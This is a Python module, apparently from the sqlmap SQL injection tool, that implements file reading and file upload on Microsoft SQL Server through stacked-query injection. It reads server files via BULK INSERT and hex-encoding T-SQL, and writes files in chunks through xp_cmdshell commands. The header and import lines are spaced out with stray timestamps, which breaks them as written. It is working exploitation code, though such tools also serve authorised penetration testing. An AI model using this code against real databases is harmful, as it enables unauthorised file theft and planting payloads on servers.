#!/usr/bin/env python
"""
$ Id $
2011-07-08 00:10:03 +04:00
Copyright ( c ) 2006 - 2011 sqlmap developers ( http : / / www . sqlmap . org / )
2010-10-15 03:18:29 +04:00
See the file ' doc/COPYING ' for copying permission
2010-03-23 01:57:57 +03:00
"""
import codecs
import ntpath
import os
from lib . core . common import getRange
from lib . core . common import isNumPosStrValue
from lib . core . common import isTechniqueAvailable
from lib . core . common import posixToNtSlashes
from lib . core . common import randomStr
from lib . core . data import conf
from lib . core . data import kb
from lib . core . data import logger
from lib . core . enums import PAYLOAD
from lib . core . exception import sqlmapNoneDataException
from lib . core . exception import sqlmapUnsupportedFeatureException
from lib . request import inject
from plugins . generic . filesystem import Filesystem as GenericFilesystem
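class Filesystem(GenericFilesystem):
    """Microsoft SQL Server file read/write over the stacked-queries technique.

    Only stacked queries are supported in both directions; the UNION variants
    raise sqlmapUnsupportedFeatureException. Reading stages the remote file
    into a support table with BULK INSERT and hex-encodes it server-side in
    T-SQL (stackedReadFile); writing uploads the local file in chunks through
    the xp_cmdshell extended procedure (stackedWriteFile).

    NOTE(review): both paths depend on server-side features (BULK INSERT,
    xp_cmdshell) and leave artefacts on the server -- support tables named
    after fileTblName and chunk files under conf.tmpPath. The methods below
    remove what they created where they can (hex table, chunk files).
    """

    def __init__(self):
        GenericFilesystem.__init__(self)

    def unionReadFile(self, rFile):
        """Not available on MSSQL; always raises sqlmapUnsupportedFeatureException."""
        errMsg = "Microsoft SQL Server does not support file reading "
        errMsg += "with UNION query SQL injection technique"
        raise sqlmapUnsupportedFeatureException(errMsg)

    def stackedReadFile(self, rFile):
        """Read the remote file *rFile* and return its content as hex chunks.

        Args:
            rFile: path of the file on the database server's file system.

        Returns:
            list of hex-encoded string chunks in file order, fetched in one
            UNION query when that technique is available, otherwise one
            request per row of the hex support table.

        Raises:
            sqlmapNoneDataException: the row count of the hex table could not
                be retrieved (nothing was staged, e.g. unreadable file).
        """
        logger.info("fetching file: '%s'" % rFile)

        txtTbl = self.fileTblName
        hexTbl = "%shex" % self.fileTblName

        # Stage the raw file in a text support table, then hex-encode it into
        # a second table whose rows fit a VARCHAR(4096) column.
        self.createSupportTbl(txtTbl, self.tblField, "text")
        inject.goStacked("DROP TABLE %s" % hexTbl)
        inject.goStacked("CREATE TABLE %s(id INT IDENTITY(1, 1) PRIMARY KEY, %s %s)" % (hexTbl, self.tblField, "VARCHAR(4096)"))

        logger.debug("loading the content of file '%s' into support table" % rFile)

        # Random field/row terminators keep the whole file in a single row.
        inject.goStacked("BULK INSERT %s FROM '%s' WITH (CODEPAGE='RAW', FIELDTERMINATOR='%s', ROWTERMINATOR='%s')" % (txtTbl, rFile, randomStr(10), randomStr(10)), silent=True)

        # Server-side hex encoding: roughly 1024 source bytes (2048 hex
        # characters) per inserted row, so each row fits VARCHAR(4096).
        # '%%' survives the % operator below as T-SQL's modulo operator.
        # Reference: http://support.microsoft.com/kb/104829
        binToHexTemplate = " ".join((
            "DECLARE @charset VARCHAR(16)",
            "DECLARE @counter INT",
            "DECLARE @hexstr VARCHAR(4096)",
            "DECLARE @length INT",
            "DECLARE @chunk INT",
            "SET @charset = '0123456789ABCDEF'",
            "SET @counter = 1",
            "SET @hexstr = ''",
            "SET @length = (SELECT DATALENGTH(%s) FROM %s)",
            "SET @chunk = 1024",
            "WHILE (@counter <= @length)",
            "BEGIN",
            "DECLARE @tempint INT",
            "DECLARE @firstint INT",
            "DECLARE @secondint INT",
            "SET @tempint = CONVERT(INT, (SELECT ASCII(SUBSTRING(%s, @counter, 1)) FROM %s))",
            "SET @firstint = floor(@tempint/16)",
            "SET @secondint = @tempint - (@firstint * 16)",
            "SET @hexstr = @hexstr + SUBSTRING(@charset, @firstint + 1, 1) + SUBSTRING(@charset, @secondint + 1, 1)",
            "SET @counter = @counter + 1",
            "IF @counter %% @chunk = 0",
            "BEGIN",
            "INSERT INTO %s(%s) VALUES (@hexstr)",
            "SET @hexstr = ''",
            "END",
            "END",
            "IF @counter %% (@chunk) != 0",
            "BEGIN",
            "INSERT INTO %s(%s) VALUES (@hexstr)",
            "END",
        ))
        binToHexQuery = binToHexTemplate % (self.tblField, txtTbl, self.tblField, txtTbl, hexTbl, self.tblField, hexTbl, self.tblField)
        inject.goStacked(binToHexQuery)

        result = []

        try:
            if isTechniqueAvailable(PAYLOAD.TECHNIQUE.UNION):
                result = inject.getValue("SELECT %s FROM %s ORDER BY id ASC" % (self.tblField, hexTbl), unique=False, resumeValue=False, blind=False, error=False)

            if not result:
                result = []

                count = inject.getValue("SELECT COUNT(*) FROM %s" % hexTbl, resumeValue=False, charsetType=2)

                if not isNumPosStrValue(count):
                    errMsg = "unable to retrieve the content of the "
                    errMsg += "file '%s'" % rFile
                    raise sqlmapNoneDataException(errMsg)

                # One request per row: the NOT IN (SELECT TOP index ...)
                # pattern selects the index-th row in id order.
                for index in getRange(count):
                    chunk = inject.getValue("SELECT TOP 1 %s FROM %s WHERE %s NOT IN (SELECT TOP %d %s FROM %s ORDER BY id ASC) ORDER BY id ASC" % (self.tblField, hexTbl, self.tblField, index, self.tblField, hexTbl), unpack=False, resumeValue=False, unique=False, charsetType=3)
                    result.append(chunk)
        finally:
            # Drop the hex table even when retrieval fails, so an aborted read
            # does not leave it behind on the server.
            inject.goStacked("DROP TABLE %s" % hexTbl)

        return result

    def unionWriteFile(self, wFile, dFile, fileType, confirm=True):
        """Not available on MSSQL; always raises sqlmapUnsupportedFeatureException."""
        errMsg = "Microsoft SQL Server does not support file upload with "
        errMsg += "UNION query SQL injection technique"
        raise sqlmapUnsupportedFeatureException(errMsg)

    def stackedWriteFile(self, wFile, dFile, fileType, confirm=True):
        """Upload the local file *wFile* to *dFile* on the server via xp_cmdshell.

        Args:
            wFile: local path of the file to upload.
            dFile: destination path on the database server; POSIX slashes are
                converted to NT ones.
            fileType: human-readable kind of file, used in log messages only.
            confirm: when True, offer to verify the written file afterwards
                (askCheckWrittenFile).

        Returns:
            None.
        """
        # NOTE: this is needed here because we use xp_cmdshell extended
        # procedure to write a file on the back-end Microsoft SQL Server
        # file system. Maybe it won't be required to write text files
        self.initEnv()
        self.getRemoteTempPath()

        debugMsg = "going to use xp_cmdshell extended procedure to write "
        debugMsg += "the %s file content to file '%s'" % (fileType, dFile)
        logger.debug(debugMsg)

        # Largest content handed to updateBinChunk() in one go.
        chunkSize = 0xFF00
        tmpPath = posixToNtSlashes(conf.tmpPath)
        dFile = posixToNtSlashes(dFile)
        dFileName = ntpath.basename(dFile)

        # Read once and size from the bytes actually read, so chunking can
        # never disagree with the content (os.path.getsize() could race with
        # a concurrent change of the file); the handle is closed even if
        # read() raises.
        with open(wFile, "rb") as wFilePointer:
            wFileContent = wFilePointer.read()
        wFileSize = len(wFileContent)

        if wFileSize < chunkSize:
            chunkName = self.updateBinChunk(wFileContent, tmpPath)
            sFile = "%s\\%s" % (tmpPath, dFileName)

            logger.debug("moving binary file %s to %s" % (sFile, dFile))

            commands = ("cd \"%s\"" % tmpPath, "ren %s %s" % (chunkName, dFileName), "move /Y %s %s" % (dFileName, dFile))
            self.execCmd(" & ".join(commands))
        else:
            infoMsg = "the %s file is bigger than %d " % (fileType, chunkSize)
            infoMsg += "bytes. sqlmap will split it into chunks, upload "
            infoMsg += "them and recreate the original file out of the "
            infoMsg += "binary chunks server-side, please wait.."
            logger.info(infoMsg)

            # The first chunk becomes the destination file; every later chunk
            # is appended with a binary copy, and each chunk file is deleted
            # right after use.
            for counter, i in enumerate(range(0, wFileSize, chunkSize), 1):
                wFileChunk = wFileContent[i:i + chunkSize]
                chunkName = self.updateBinChunk(wFileChunk, tmpPath)

                if i == 0:
                    infoMsg = "renaming chunk "
                    copyCmd = "ren %s %s" % (chunkName, dFileName)
                else:
                    infoMsg = "appending chunk "
                    copyCmd = "copy /B /Y %s+%s %s" % (dFileName, chunkName, dFileName)

                infoMsg += "%s\\%s to %s\\%s" % (tmpPath, chunkName, tmpPath, dFileName)
                logger.debug(infoMsg)

                commands = ("cd \"%s\"" % tmpPath, copyCmd, "del /F %s" % chunkName)
                self.execCmd(" & ".join(commands))

                logger.info("file chunk %d written" % counter)

            sFile = "%s\\%s" % (tmpPath, dFileName)

            logger.debug("moving binary file %s to %s" % (sFile, dFile))

            commands = ("cd \"%s\"" % tmpPath, "move /Y %s %s" % (dFileName, dFile))
            self.execCmd(" & ".join(commands))

        if confirm:
            self.askCheckWrittenFile(wFile, dFile, fileType)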